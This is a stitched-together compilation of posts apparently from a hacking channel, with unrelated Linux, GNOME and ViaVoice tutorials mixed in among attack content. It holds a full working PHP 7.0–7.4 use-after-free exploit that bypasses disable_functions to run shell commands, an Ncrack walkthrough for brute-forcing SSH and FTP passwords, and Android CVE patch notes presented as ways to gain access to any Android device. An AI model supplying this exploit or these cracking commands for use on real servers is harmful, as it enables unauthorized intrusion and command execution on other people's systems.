▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Top cracking tool how use Ncrack tool :
http://pinterest.com/UndercOdeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Ncrack is used frequently in hacking FTP and SSH servers. Hackers love this because this is much faster and accurate than Hydra.


How to:

(clone https://github.com/nmap/ncrack)


1) This is the key command of using Ncrack in cracking SSH passwords:
ncrack -p 22 --user admin -P pass.txt 192.168.1.1 -vv

2) -p 22 is the port of your target. Since we are targeting the SSH of the target then we write 22 because SSH = port 22 in most cases.

3) user admin is used because we already know that the username of our target as example...

4) -P pass.txt is used because we don’t know yet the password (of course!) and this is where we put our wordlist

5)192.168.1.1 is where you put the IP address of your target 6. -vv is used just to verbose what is doing by the tool in the background while finding the password

6) If you are trying this to hack FTP then just change the port 22 to 21 because FTP is using port 21 in most cases.

7) well done!

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 bug from few days- PHP 7.0 < 7.4 (Unix) debug_backtrace disable_functions Bypass

<?php

$cmd = "id";

$n_alloc = 10; # increase this value if you get segfaults

class MySplFixedArray extends SplFixedArray {
public static $leak;
}

class Z implements JsonSerializable {
public function write(&$str, $p, $v, $n = 8) {
$i = 0;
for($i = 0; $i < $n; $i++) {
$str[$p + $i] = chr($v & 0xff);
$v >>= 8;
}
}

public function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}

public function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}

# unable to leak ro segments
public function leak1($addr) {
global $spl1;

$this->write($this->abc, 8, $addr - 0x10);
return strlen(get_class($spl1));
}

# the real deal
public function leak2($addr, $p = 0, $s = 8) {
global $spl1, $fake_tbl_off;

# fake reference zval
$this->write($this->abc, $fake_tbl_off + 0x10, 0xdeadbeef); # gc_refcounted
$this->write($this->abc, $fake_tbl_off + 0x18, $addr + $p - 0x10); # zval
$this->write($this->abc, $fake_tbl_off + 0x20, 6); # type (string)

$leak = strlen($spl1::$leak);
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }

return $leak;
}

public function parse_elf($base) {
$e_type = $this->leak2($base, 0x10, 2);

$e_phoff = $this->leak2($base, 0x20);
$e_phentsize = $this->leak2($base, 0x36, 2);
$e_phnum = $this->leak2($base, 0x38, 2);

for($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = $this->leak2($header, 0, 4);
$p_flags = $this->leak2($header, 4, 4);
$p_vaddr = $this->leak2($header, 0x10);
$p_memsz = $this->leak2($header, 0x28);

if($p_type == 0x6474e552) { # PT_GNU_RELRO
# handle pie
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
$text_size = $p_memsz;
}
}

if(!$data_addr || !$text_size || !$data_size)
return false;

return [$data_addr, $text_size, $data_size];
}

public function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for($i = 0; $i < $data_size / 8; $i++) {
$leak = $this->leak2($data_addr, $i * 8);
if($leak - $base > 0 && $leak - $base < $text_size) {
$deref = $this->leak2($leak);
# 'constant' constant check
if($deref != 0x746e6174736e6f63)
continue;
} else continue;

$leak = $this->leak2($data_addr, ($i + 4) * 8);
if($leak - $base > 0 && $leak - $base < $text_size) {
$deref = $this->leak2($leak);
# 'bin2hex' constant check
if($deref != 0x786568326e6962)
continue;
} else continue;

return $data_addr + $i * 8;
}
}

public function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = $this->leak2($addr, 0, 7);
if($leak == 0x10102464c457f) { # ELF header
return $addr;
}
}
}

public function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = $this->leak2($addr);
$f_name = $this->leak2($f_entry, 0, 6);
if($f_name == 0x6d6574737973) { # system

return $this->leak2($addr + 8);
}
$addr += 0x20;
} while($f_entry != 0);
return false;
}

public function jsonSerialize() {
global $y, $cmd, $spl1, $fake_tbl_off, $n_alloc;

$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)
$contiguous[] = new DateInterval('PT1S');

$room = [];
for($i = 0; $i < $n_alloc; $i++)
$room[] = new Z();

$_protector = $this->ptr2str(0, 78);

$this->abc = $this->ptr2str(0, 79);
$p = new DateInterval('PT1S');

unset($y[0]);
unset($p);

$protector = ".$_protector";

$x = new DateInterval('PT1S');
$x->d = 0x2000;
$x->h = 0xdeadbeef;
# $this->abc is now of size 0x2000

if($this->str2ptr($this->abc) != 0xdeadbeef) {
die('UAF failed.');
}

$spl1 = new MySplFixedArray();
$spl2 = new MySplFixedArray();

# some leaks
$class_entry = $this->str2ptr($this->abc, 0x120);
$handlers = $this->str2ptr($this->abc, 0x128);
$php_heap = $this->str2ptr($this->abc, 0x1a8);
$abc_addr = $php_heap - 0x218;

# create a fake class_entry
$fake_obj = $abc_addr;
$this->write($this->abc, 0, 2); # type
$this->write($this->abc, 0x120, $abc_addr); # fake class_entry

# copy some of class_entry definition
for($i = 0; $i < 16; $i++) {
$this->write($this->abc, 0x10 + $i * 8,
$this->leak1($class_entry + 0x10 + $i * 8));
}

# fake static members table
$fake_tbl_off = 0x70 * 4 - 16;
$this->write($this->abc, 0x30, $abc_addr + $fake_tbl_off);
$this->write($this->abc, 0x38, $abc_addr + $fake_tbl_off);

# fake zval_reference
$this->write($this->abc, $fake_tbl_off, $abc_addr + $fake_tbl_off + 0x10); # zval
$this->write($this->abc, $fake_tbl_off + 8, 10); # zval type (reference)

# look for binary base
$binary_leak = $this->leak2($handlers + 0x10);
if(!($base = $this->get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}

# parse elf header
if(!($elf = $this->parse_elf($base))) {
die("Couldn't parse ELF");
}

# get basic_functions address
if(!($basic_funcs = $this->get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}

# find system entry
if(!($zif_system = $this->get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}

# copy hashtable offsetGet bucket
$fake_bkt_off = 0x70 * 5 - 16;

$function_data = $this->str2ptr($this->abc, 0x50);
for($i = 0; $i < 4; $i++) {
$this->write($this->abc, $fake_bkt_off + $i * 8,
$this->leak2($function_data + 0x40 * 4, $i * 8));
}

# create a fake bucket
$fake_bkt_addr = $abc_addr + $fake_bkt_off;
$this->write($this->abc, 0x50, $fake_bkt_addr);
for($i = 0; $i < 3; $i++) {
$this->write($this->abc, 0x58 + $i * 4, 1, 4);
}

# copy bucket zval
$function_zval = $this->str2ptr($this->abc, $fake_bkt_off);
for($i = 0; $i < 12; $i++) {
$this->write($this->abc, $fake_bkt_off + 0x70 + $i * 8,
$this->leak2($function_zval, $i * 8));
}

# pwn
$this->write($this->abc, $fake_bkt_off + 0x70 + 0x30, $zif_system);
$this->write($this->abc, $fake_bkt_off, $fake_bkt_addr + 0x70);

$spl1->offsetGet($cmd);

exit();
}
}

$y = [new Z()];
json_encode([&$y]);

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑what can do ? (the posted linux exploite code LINUX EXPLOITE) :

> This exploit uses a bug in debug_backtrace() function.

> We can trick it into returning a reference to a variable that has been destroyed, causing a use-after-free vulnerability.

> The PoC was tested on various php builds for Debian/Ubuntu/CentOS/FreeBSD with cli/fpm/apache2 server APIs and found to work reliably.
(already patched in Under code os )

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

So results For android CVe 👌👍Nice choises

LET S STARTS

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Two ways Linux processes allocate memory-brk () and mmap ()
How can I see the number of page faults in a process?
twitter.com/UnderCodeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> Use ps -o majflt, minflt -C program command to view.
>majflt stands for major fault, the Chinese name is major fault, minflt stands for minor fault, and the Chinese name is minor fault.
> These two values represent the number of page faults that have occurred since a process was started.
🦑 What operations were performed after a page fault was issued?

When a process has a page fault interrupt, the process will fall into kernel mode and perform the following operations:

1) Check if the virtual address to be accessed is valid

2) Find / allocate a physical page

3) Fill the physical page content (read the disk, or Set it directly to 0, or do nothing)

4) Establish the mapping relationship (virtual address to physical address) and
re-execute the instruction that caused a page fault.

5) If the third step requires reading the disk, the page fault is majflt. , Otherwise it is minflt.

🦑 The principle of memory allocation:

>From the operating system perspective, there are two ways for a process to allocate memory, which are completed by two system calls: brk and mmap (without considering shared memory).

1) brk is to push the highest address pointer _edata of the data segment (.data) to the higher address;

2) mmap is to find a piece of free virtual memory in the virtual address space of the process (between the heap and the stack, called the file mapping area).

> Both methods allocate virtual memory, and do not allocate physical memory. When the allocated virtual address space is accessed for the first time, a page fault occurs, and the operating system is responsible for allocating physical memory, and then establishing a mapping relationship between virtual memory and physical memory.

> In the standard C library, malloc / free functions are provided to allocate and free memory. The bottom layer of these two functions is implemented by brk, mmap, and munmap system calls.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Non-technical-Controlling Linux with Language: Linux's Speech Recognition Software Full by UndercOde
pinterest.com/UndercOdeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Linux ViaVoice requires the machine's configuration: a 16-bit sound card. In fact, ViaVoice is designed and developed specifically for Red Hat, but users can run ViaVoice normally in the Red Hat, environment and other Linux versions. Of course, users may also encounter some problems during the installation process.

2) Before installing ViaVoice speech recognition software, you must first install the Java runtime environment. ViaVoice versions were tested in a JRE-1.2.2 environment. Using the correct-old stable version can avoid incompatibilities in different JRE environments.

3) After the JRE installation is complete, put the installation disk into the CD-ROM drive and run vvsetup in the root directory, and then run vvstartuser to set yourself as a ViaVoice user and set the appropriate volume. Finally, practice repeatedly to make the software adapt to your voice. Remember that the order of installation must never be reversed.

4) "Tuning" ViaVoice is
like other speech recognition software. ViaVoice, installed for the first time, cannot recognize the user's voice very accurately. The user must "tune" it before it can recognize the user's voice.

5) One way to “tweak” ViaVoice is to repeat the words in the user manual repeatedly. For most users, this is not difficult, but the words in the manual may not be used often by users, so this method is not very efficient.

6) A better method is to use ViaVoice's Dictation application software at work. It is written in Java. When the user dictates, some words may not be recognized correctly. When this happens, the user can modify it using the appropriate tools in Dictation. ViaVoice can then modify the recognition tool to more accurately identify the user's voice. This method may take more effort, but similar modifications can be done with voice commands. However, please keep it in mind as Dictation is not very stable.

7) An expert once said that the current speech recognition software can reach a 98% accuracy rate after only 10 to 60 hours of "tuning". But so far, the results of testing ViaVoice in the Linux environment are that it is only 92% to 95% accurate, and most voice commands can be correctly recognized. Even if the user spends only a few hours practicing, you can find that the accuracy of ViaVoice is significantly improved. However, users should pay special attention when using it, the pronunciation of words, the quality of the microphone and the surrounding environment will affect the accuracy of speech recognition.

8) viva voice official site http://www.vivavocesrs.com/

9) XVoice Controls Linux Desktop
> After users have completed the installation and training of ViaVoice, they can install Xvoice. Xvoice's role is to control the desktop system and application software. ViaVoice does not have these features. Users can go to xvoice.sourceforge.net to download the Xvoice software. Note that you must install the RPM in advance, because the source program requires ViaVoice in the Linux SDK to be interrupted.

10) After the installation is complete, enter xvoice m in the last window that appears, taking care not to run Dictation. At this point, the user can do a simple test, dictate the command "next window", and another window should appear on the desktop.

11) Xvoice allows users to pre-set some spoken commands for operations. A set of spoken commands is called a grammar group. Syntax groups can be associated with a specific application, window, or a module in an application, or they can be generated by context. Operations invoked by dictated commands can include keyboard strokes, mouse events, running external commands, or any combination of the three.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Leverage GNOME Libraries to make writing applications easier
http://pinterest.com/UndercOdeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> This application has a menu menu and a detachable sub-menu, as well as a status bar that displays menu prompts, and automatically stores user-defined accelerator keys (hot keys). There is a standard "" About "" box In addition, all menu standard items have the ability to automatically switch languages ​​(try "" LANG = zh_TW.Big5 ./hello_world "", you will see a menu of Chinese characters).



/ * Hello World (Gnome Edition)
* Listing 1
* This code is public domain, so use it as you please.



* libraries that gnome needs, such as gtk, imlib, etc ...*/
#include

/* this is usually defined by autoconf but were just using simple makefiles */
#define VERSION ""1.0""

/* ""callback"" function (signal handler) which will quit the application*/
static void
exit_hello(GtkWidget *widget, gpointer data)
{
gtk_main_quit ();
}

/* callback function for when the window closes */
static int
delete_event(GtkWidget *widget, gpointer data)
{
gtk_main_quit ();
return FALSE; /* false means continue with closing the window */
}

/* a callback for the about menu item, it will display a simple ""About""
* dialog box standard to all gnome applications
*/
void
about_hello(GtkWidget *widget, gpointer data)
{
GtkWidget *box;
const char *authors[] = {
""James Bond"",
NULL
};

box = gnome_about_new(/*title: */ ""Hello World (Gnome Edition)"",
/*version: */VERSION,
/*copyright: */ ""(C) 1999 Secret Agents Inc."",
/*authors: */authors,
/*other comments: */
""An extremely complicated application which ""
""does absolutely nothing useful"",
NULL);
gtk_widget_show(box);
}

/* define the menus here */

static GnomeUIInfo file_menu [] = {
/* some item which is not one of the standard ones, the null
* would be the callback, however we dont want to really do anything */
GNOMEUIINFO_ITEM_NONE(""Something"",""Just an item which does nothing"",NULL),
/* standard exit item */
GNOMEUIINFO_MENU_EXIT_ITEM(exit_hello,NULL),
GNOMEUIINFO_END
};

static GnomeUIInfo help_menu [] = {
/* load the helpfiles for this application if available */
GNOMEUIINFO_HELP(""hello_world""),
/* the standard about item */
GNOMEUIINFO_MENU_ABOUT_ITEM(about_hello,NULL),
GNOMEUIINFO_END
};

/* define the main menubar */
static GnomeUIInfo main_menu [] = {
GNOMEUIINFO_MENU_FILE_TREE(file_menu),
GNOMEUIINFO_MENU_HELP_TREE(help_menu),
GNOMEUIINFO_END
};

🦑then /* Our main function */
int
main(int argc, char *argv[])
{
GtkWidget *app; /* pointer to our main window */
GtkWidget *w; /* pointer to some widget */

/* initialize gnome */
......

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Termux-Webpentest... tool
> txtool is made to help you for easly pentesting in termux,
t.me/UndercOdeTesting

1) git clone https://github.com/kuburan/txtool.git

2) cd txtool

3) apt install python2

4) ./install.py

5) Mtxtool

@UndercOdeTesting

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑2020 all Android Cve - VULNERABILITIES TO GAIN ACCESS ON ANY ANDROID :
twitter.com/UndercOdeTC

> CVE References Type Severity Updated AOSP versions

1) CVE-2020-0014 A-128674520 EoP High 8.0, 8.1, 9, 10

2) CVE-2020-0015 A-139017101 EoP High 8.0, 8.1, 9, 10

3) CVE-2019-2200 A-67319274 EoP High 10

4) CVE-2020-0017 A-123232892 [2] ID High 8.0, 8.1, 9, 10

5) CVE-2020-0018 A-139945049 ID High 8.0, 8.1, 9, 10

6) CVE-2020-0020 A-143118731 ID High 10

7) CVE-2020-0021 A-141413692 [2] [3] DoS High 10

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Let s Start with First Android Vulnerabilitie :
instagram.com/UndercOdeTestingCompany

🦑 CVE-2020-0014 A-128674520 EoP High 8.0, 8.1, 9, 10 :

1) RESTRICT AUTOMERGE
Make toasts non-clickable

2) Since enforcement was only on client-side, in Toast class, an app could

3) use reflection (or other means) to make the Toast clickable. This is a
security vulnerability since it allows tapjacking, that is, intercept touch
events and do stuff like steal PINs and passwords.

🦑This CL brings the enforcement to the system by applying flag
FLAG_NOT_TOUCHABLE.

Test: atest CtsWindowManagerDeviceTestCases:ToastTest
Test: Construct app that uses reflection to remove flag FLAG_NOT_TOUCHABLE and
log click events. Then:

1) Observe click events are logged without this CL.

2) Observer click events are not logged with this CL.

Bug: 128674520

Change-Id: Ic36585bc4f186e0224f5b687c49c0b3d9266838c
(cherry picked from commit b81f269ae2afb446b9d4a909fc2bcf038af00c41)

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 CVE-2020-0015 A-139017101 EoP High 8.0, 8.1, 9, 10
Android bug details :
instagram.com/UndercOdeTestingCompany

1) KeyChain: Do not allow hiding Cert Install dialog

2) Do not allow apps to float a window on top of the certificate
installation / naming dialog.

3) This obscures the CA certificate installation dialog and could be used
to trick a user into installing a CA certificate.

4) This is fixed by adding the HIDE_NON_SYSTEM_OVERLAY_WINDOWS system
flag when the activity is created (onCreate), so that another activity
starting in the foreground would not be able to obscure the dialog.

Bug: 139017101
Test: Manual, with an app that floats a window.
Change-Id: Iff8e678743c3883cf1f7f64390097a768ca00856
(cherry picked from commit afdacb2ec4c5cdc2fb2a9943fa5b48100f4725c8)


@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 CVE-2020-0015 A-139017101 EoP High 8.0, 8.1, 9, 10
ANDROID BUG DETAIL :

🦑 Revoke granted permission when the permission defining app is removed.☠️

> Bug: 67319274

> Test: atest android.permission.cts.RemovePermissionTest

> Change-Id: I22df546f5cd19e10045131d36dc3f5033f727baa

> Merged-In: I20c4c975a1dd41a0a6c3e068988fe60be51dd1b4
(cherry picked from commit bde381848d0d07780710ce36e0c974646ba8f995)

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑NOW ANDROID SYSTEM BUGS SUCH BLUETOOTH-SOFTWARE BUGS ANDROID 7-8-9
twitter.com/UndercOdeTC



🦑 CVE References Type Severity Updated AOSP versions


1) CVE-2020-0022 A-143894715 DoS Moderate 10

> GAP: Correct the continuous pkt length in l2cap

L2cap continuous pkt length wrongly calculated in
reassembly logic when remote sends more data
than expected.

Wrong pkt length leading to memory corruption

Hence the Correct the continuous pkt length in
l2cap reassembly logic.

Bug: 135239489
Bug: 143894715
CRs-Fixed: 2434229
Test: make and internal testing
Change-Id: I758d9e31465b99e436b9b1841320000f08186c97
Merged-In: I758d9e31465b99e436b9b1841320000f08186c97
(cherry picked from commit 337bd4579453bd6bf98ff519de3ac1019cd30d28)
(cherry picked from commit 602f4b44fe30ec8b225e1cee5f96817607d93e5a)


2) RCE Critical 8.0, 8.1, 9
CVE-2020-0023 A-145130871 ID Critical 10
>Enforce BLUETOOTH_PRIVILEGED in setPhonebookAccessPermission

Bug: 145130871
Test: POC
Merged-In: Ib4985e18de9f6695acc371da78deb240d42671f1
Change-Id: I3b8897166e223179fcbcf8c7a64e0c4d4ca974ef
(cherry picked from commit 8d1e8979f56acfe477bd3b84994a716a8391a8eb)


3) CVE-2020-0005 A-141552859 EOP High 8.0, 8.1, 9, 10

4) CVE-2020-0026 A-140419401 EoP High 8.0, 8.1, 9, 10

5) CVE-2020-0027 A-144040966 EoP High 8.0, 8.1, 9, 10

6) CVE-2020-0028 A-122652057 [2] ID High 9

🦑hope after all those and more bugs coming for android, may you figured out the meaning of: ''NOTHING SAFE''

🦑For any doubt feel free to ask us

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁